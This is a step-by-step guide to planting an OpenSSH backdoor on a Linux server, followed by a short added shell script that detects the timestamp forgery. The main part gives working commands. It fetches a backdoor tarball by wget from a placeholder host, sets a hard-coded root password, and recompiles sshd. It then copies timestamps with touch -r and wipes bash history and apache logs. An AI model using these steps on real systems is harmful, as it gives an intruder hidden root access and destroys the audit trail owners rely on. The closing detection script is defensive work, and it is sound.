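Back up the original files:
1. mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
2. mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
3. Download and install the SSH backdoor: place the sshdb.tgz backdoor package in a directory on your own server and rename it to test.tgz; here it is in the web root of www.test.com.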
# wget http://www.test.com/test.tgz
# tar zxvf test.tgz
# cd openssh
4. Set the login password for the SSH backdoor:
vi includes.h
#define _SECRET_PASSWD "test1234"   -> # test1234 is the backdoor connection password
5. Compile and install:
# ./configure --prefix=/usr --sysconfdir=/etc/ssh
# make && make install
# cp ssh_config sshd_config /etc/ssh/
Modify the file timestamps:
touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config
Restart the service:
# /etc/init.d/sshd restart
6. Log in through the backdoor:
ssh -l root IP
password:123456
echo >/root/.bash_history   // clear the operation log
7. Clear the apache logs:
export HISTFILE=/dev/null
export HISTSIZE=0
cd /etc/httpd/logs/
sed -i '/IP/d' access_log*
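
The `touch -r` step above rewrites only mtime and atime; the kernel still stamps the inode change time (ctime) when the file is replaced, so the swapped files can be found from that mismatch and from the `.old` copies left beside them. The check below is an added example for defenders, not part of the original page; it assumes GNU coreutils `stat`, and the function names and thresholds are illustrative.

```shell
#!/bin/sh
# Added defensive example. Assumes GNU coreutils `stat` (-c %Y / %Z).
# Function names, window and skew values are illustrative assumptions.

# Print files in DIR whose ctime falls within the last WINDOW seconds while
# their mtime claims to be at least SKEW seconds older than that ctime.
# `touch -r` can set mtime/atime, but ctime is always set to "now".
find_mtime_rollback() (
    dir=$1; window=${2:-86400}; skew=${3:-60}
    now=$(date +%s)
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        mtime=$(stat -c %Y "$f")
        ctime=$(stat -c %Z "$f")
        if [ $((now - ctime)) -le "$window" ] &&
           [ $((ctime - mtime)) -ge "$skew" ]; then
            printf '%s mtime=%s ctime=%s\n' "$f" "$mtime" "$ctime"
        fi
    done
)

# Print files that have a "<name>.old" sibling with an identical mtime but
# different content: the trace left when a file is renamed aside and its
# timestamp is copied onto a replacement.
find_cloned_mtime() (
    dir=$1
    for old in "$dir"/*.old; do
        [ -f "$old" ] || continue
        cur=${old%.old}
        [ -f "$cur" ] || continue
        if [ "$(stat -c %Y "$old")" = "$(stat -c %Y "$cur")" ] &&
           ! cmp -s "$old" "$cur"; then
            printf '%s\n' "$cur"
        fi
    done
)

# When a directory is passed as the first argument (e.g. /etc/ssh), check it
# for changes made during the last 7 days.
if [ -n "${1:-}" ]; then
    find_mtime_rollback "$1" 604800
    find_cloned_mtime "$1"
fi
```

Package upgrades also leave ctime newer than mtime, so correlate any hit with the package manager's log and verify the installed OpenSSH files with `rpm -V openssh-server` or `debsums`.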